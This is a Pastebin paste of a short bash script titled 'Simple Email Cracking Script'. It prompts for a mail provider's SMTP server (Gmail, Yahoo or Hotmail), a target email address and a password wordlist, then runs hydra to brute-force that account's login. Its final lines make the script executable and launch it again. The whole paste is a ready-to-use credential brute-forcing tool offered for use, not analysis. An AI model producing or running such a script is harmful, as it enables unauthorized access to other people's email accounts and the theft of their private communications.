mansz81

mail.sh

Mar 8th, 2022 (edited)
217
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 0.43 KB | None | 0 0
  1. #! /bin/bash
  2.  
  3. echo Simple Email Cracking Script in bash
  4. echo NOTE: Make sure you have wordlists!
  5. echo Let us Begin:
  6. echo Choose a SMTP service: Gmail = smtp.gmail.com / Yahoo = smtp.mail.yahoo.com / Hotmail = smtp.live.com /:
  7. read smtp
  8. echo Enter Email Address:
  9. read email
  10. echo Provide Directory of Wordlist for Passwords:
  11. read wordlist
  12.  
  13. hydra -S -l $email -P $wordlist -e ns -V -s 465 $smtp smtp
  14.  
  15. chmod a+x mail.sh
  16.  
  17. ./mail.sh
Add Comment
Please, Sign In to add comment